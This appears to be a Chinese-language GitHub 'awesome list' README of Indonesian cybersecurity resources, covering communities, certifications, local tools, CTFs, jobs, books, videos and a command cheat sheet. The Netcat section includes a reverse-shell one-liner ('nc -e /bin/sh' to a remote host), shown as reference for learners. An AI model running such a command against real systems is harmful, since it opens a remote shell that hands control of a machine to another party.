vtino17/awesome-id-cybersecurity
GitHub: vtino17/awesome-id-cybersecurity
为印度尼西亚专业人士和学生精心策划的网络安全综合资源导航,整合了社区、培训认证、本土工具、CTF竞赛、求职渠道及命令速查等内容。
Stars: 0 | Forks: 0
# 印度尼西亚网络安全精选
为印度尼西亚的专业人士、学生和爱好者精心策划的网络安全资源。
## 目录
- [社区](#komunitas)
- [培训与认证](#training--sertifikasi)
- [印度尼西亚本土工具](#tools-buatan-indonesia)
- [CTF与竞赛](#ctf--kompetisi)
- [博客与媒体](#blog--media)
- [工作机会](#lowongan-kerja)
- [书籍与参考](#buku--referensi)
- [YouTube 频道](#channel-youtube)
- [免费在线课程](#kelas-online-gratis)
## 社区
| 社区 | 平台 | 描述 |
|-----------|----------|-----------|
| [ID-CERT](https://www.cert.or.id) | Web | 印度尼西亚计算机安全事件响应团队 |
| [Indonesia Hacker](https://www.facebook.com/groups/indonesiahacker) | Facebook 群组 | 印尼最大的黑客社区 |
| [Cyber Security Indonesia](https://www.facebook.com/groups/cybersecindonesia) | Facebook 群组 | 印度尼西亚网络安全讨论 |
| [Komunitas Cyber Security Indonesia](https://t.me/cybersecindonesia) | Telegram | Telegram 网络安全群组 |
| [Linux Indonesia](https://t.me/linux_id) | Telegram | Linux 与安全讨论 |
| [DevOps Indonesia](https://t.me/devops_indonesia) | Telegram | 基础设施与云安全 |
| [MikroTik Indonesia](https://www.facebook.com/groups/mikrotikindonesia) | Facebook 群组 | MikroTik 配置与安全加固 |
| [Defacer.ID](https://defacer.id) | Web | 网页篡改归档与安全新闻 |
## 培训与认证
### 全球认证
| 认证 | 等级 | 费用 | 备注 |
|-------------|-------|-------|---------|
| CompTIA Security+ | 入门 | $400 | 网络安全基础 |
| CEH (Certified Ethical Hacker) | 中级 | $1,200 | EC-Council,在印尼很受欢迎 |
| OSCP (Offensive Security) | 高级 | $1,600 | 实战渗透测试 |
| CISSP | 高级 | $750 | 安全管理 |
| CCNA | 入门 | $300 | 网络基础,安全的前置条件 |
| AWS Security | 中级 | $150 | 云安全 |
### 本地认证
| 认证 | 机构 | 费用 |
|-------------|----------|-------|
| CCEP | Red Team Leaders | ~Rp 500K |
| CRTOM | Red Team Leaders | ~Rp 500K |
| BNSP IT Security | BNSP | ~Rp 3-5 Juta |
### 免费培训平台
- [PortSwigger Web Security Academy](https://portswigger.net/web-security) - 免费的 Web 安全实验室
- [TryHackMe](https://tryhackme.com) - 实践网络安全(免费层)
- [HackTheBox](https://www.hackthebox.com) - CTF 风格的实验室
- [PicoCTF](https://picoctf.com) - 适合初学者的 CTF
- [OWASP WebGoat](https://owasp.org/www-project-webgoat/) - Web 安全培训
- [PentesterLab](https://pentesterlab.com) - Web 漏洞利用练习
- [OverTheWire](https://overthewire.org) - 用于 Linux 安全的 WarGames
## 印度尼西亚本土工具
| 工具 | 作者 | 描述 |
|------|--------|-----------|
| [kage](https://github.com/vtino17/kage) | vtino17 | AI 驱动的安全扫描器 |
| [tools](https://github.com/vtino17/tools) | vtino17 | 85+ 渗透测试工具集 |
| [taskcapsule](https://github.com/vtino17/taskcapsule) | vtino17 | 任务上下文管理器 |
| [mikrotik-hardening](https://github.com/vtino17/mikrotik-hardening) | vtino17 | RouterOS 安全配置 |
| [wazuh-custom-decoders](https://github.com/vtino17/wazuh-custom-decoders) | vtino17 | 自定义 Wazuh SIEM 规则 |
| [vuln-scanner](https://github.com/vtino17/vuln-scanner) | vtino17 | 漏洞扫描器 |
| [pcap-forensics](https://github.com/vtino17/pcap-forensics) | vtino17 | PCAP 取证分析 |
| [pysecnet](https://github.com/vtino17/pysecnet) | vtino17 | Python 网络库 |
| [cyberlab](https://github.com/vtino17/cyberlab) | vtino17 | 一键实验室部署工具 |
| [incident-response-playbooks](https://github.com/vtino17/incident-response-playbooks) | vtino17 | 应急响应手册与取证 |
| [network-automation-toolkit](https://github.com/vtino17/network-automation-toolkit) | vtino17 | 多供应商网络自动化 |
| [deep-mind-skill](https://github.com/vtino17/deep-mind-skill) | vtino17 | AI 批判性思维技能 |
## CTF与竞赛
### CTF 平台
- [CTFtime](https://ctftime.org) - 全球 CTF 日程
- [HackTheBox CTF](https://ctf.hackthebox.com) - 每月 CTF
- [CTF.ID](https://ctf.id) - 印度尼西亚 CTF
### 年度竞赛
| 活动 | 主办方 | 级别 |
|-------|---------------|---------|
| Gemastik | Kemendikbud | 国家级 |
| IndoSec | ID-SIRTII | 国家级 |
| Compfest | Universitas Indonesia | 国家级 |
| Techcomfest | Kemendikbud | 国家级 |
| FCC (Fostering Cyber Talent) | BSSN | 国家级 |
## 博客与媒体
- [OWASP Indonesia](https://owasp.org/www-chapter-indonesia/)
- [ID-SIRTII](https://idsirtii.or.id)
- [BSSN](https://bssn.go.id)
- [PUSAD (CSIRT PENS)](https://csirt.pens.ac.id)
- [Medium - Cyber Security Indonesia](https://medium.com/tag/cyber-security-indonesia)
## 分析与取证工具
| 工具 | 描述 |
|------|-----------|
| [Wireshark](https://wireshark.org) | 网络数据包分析器 |
| [Burp Suite](https://portswigger.net/burp) | Web 安全测试 |
| [Nmap](https://nmap.org) | 网络扫描器 |
| [Metasploit](https://metasploit.com) | 漏洞利用框架 |
| [Wazuh](https://wazuh.com) | SIEM 与 XDR |
| [Velociraptor](https://github.com/Velocidex/velociraptor) | 终端可见性 |
| [TheHive](https://thehive-project.org) | 应急响应平台 |
| [MISP](https://misp-project.org) | 威胁情报平台 |
| [YARA](https://virustotal.github.io/yara/) | 恶意软件模式匹配 |
| [Volatility](https://volatilityfoundation.org) | 内存取证 |
| [Autopsy](https://sleuthkit.org/autopsy/) | 磁盘取证 |
| [Zeek](https://zeek.org) | 网络监控 |
| [Suricata](https://suricata.io) | IDS/IPS 引擎 |
| [Cuckoo Sandbox](https://cuckoosandbox.org) | 恶意软件分析 |
| [Grafana](https://grafana.com) | 监控仪表盘 |
| [Prometheus](https://prometheus.io) | 指标收集 |
## 工作机会
- [Glints](https://glints.com) - 筛选“Cyber Security”、“IT Security”
- [LinkedIn](https://linkedin.com) - 筛选印度尼西亚地区
- [Jobstreet](https://jobstreet.co.id)
- [Karir.com](https://karir.com)
- [Tech in Asia Jobs](https://techinasia.com/jobs)
## 书籍与参考
### 印尼语
- [Kuliah Gratis Cyber Security](https://www.coursera.org/professional-certificates/google-cybersecurity) - Google Cybersecurity (EN)
- [Materi Cyber Security PENS](https://csirt.pens.ac.id)
- [E-Book CEH Bahasa Indonesia](https://www.google.com/search?q=ceh+ebook+bahasa+indonesia)
### 英语(推荐)
- The Web Application Hacker's Handbook
- The Practice of Network Security Monitoring
- Red Team Field Manual
- Blue Team Handbook
- Metasploit: The Penetration Tester's Guide
## YouTube 频道
### 印尼语
| 频道 | 专注领域 |
|---------|-------|
| [Onesinus Tambunan](https://youtube.com/@onesinustambunan) | 网络、MikroTik |
| [ID-Networkers](https://youtube.com/@id-networkers) | 网络工程师 |
| [Kelas Network](https://youtube.com/@kelasnetwork) | 网络基础 |
| [Cyber Security Indonesia](https://youtube.com/@cybersecurityindonesia) | 通用安全 |
### 英语
| 频道 | 专注领域 |
|---------|-------|
| [John Hammond](https://youtube.com/@johnhammond) | 恶意软件、CTF |
| [IppSec](https://youtube.com/@ippsec) | HTB 攻略 |
| [NetworkChuck](https://youtube.com/@networkchuck) | 网络、安全 |
| [LiveOverflow](https://youtube.com/@liveoverflow) | 漏洞利用开发 |
| [STÖK](https://youtube.com/@stokfredrik) | Bug bounty |
## 命令参考
### Nmap
```
nmap -sV -sC -O target # Service + OS detection
nmap -p- target # All ports scan
nmap --script vuln target # Vulnerability scan
nmap -sU target # UDP scan
nmap -sn 10.0.0.0/24 # Ping sweep
```
### Netcat
```
nc -lvnp 4444 # Listen on port
nc -vn 10.0.0.1 22 # Connect to port
nc -e /bin/sh 10.0.0.1 4444 # Reverse shell
```
### tcpdump
```
tcpdump -i eth0 # Capture interface
tcpdump -i eth0 port 80 # HTTP traffic
tcpdump -i eth0 host 10.0.0.1 # Host traffic
tcpdump -w capture.pcap # Write to file
```
### Linux 安全
```
sudo ss -tlnp # Listening ports
sudo netstat -tulpn # Connection status
sudo iptables -L -n # Firewall rules
sudo journalctl -xe # System logs
sudo fail2ban-client status # Brute force status
sudo rkhunter --check # Rootkit scan
```
### Windows 安全
```
Get-EventLog -LogName Security -Newest 100
Get-Process | Where-Object {$_.Path -like "*temp*"}
netstat -ano | findstr LISTEN
wevtutil qe Security /c:10 /rd:true /e:true
```
## 免费在线课程
| 平台 | 课程 | 时长 |
|----------|--------|--------|
| [Coursera](https://coursera.org) | Google Cybersecurity | 6 个月 |
| [Cybrary](https://cybrary.it) | CompTIA Security+ | 自定进度 |
| [PicoCTF](https://picoctf.com) | 学习 CTF | 自定进度 |
| [OWASP](https://owasp.org) | Web 安全测试指南 | 自定进度 |
| [TryHackMe](https://tryhackme.com) | 完全新手 | 20 小时 |
| [PortSwigger](https://portswigger.net) | Web Security Academy | 自定进度 |
**由 [Valentino Saputra](https://github.com/vtino17) 维护** — 欢迎通过 PR 贡献。
*最后更新:2026 年 7 月*
标签:CTI, 逆向工具, 防御加固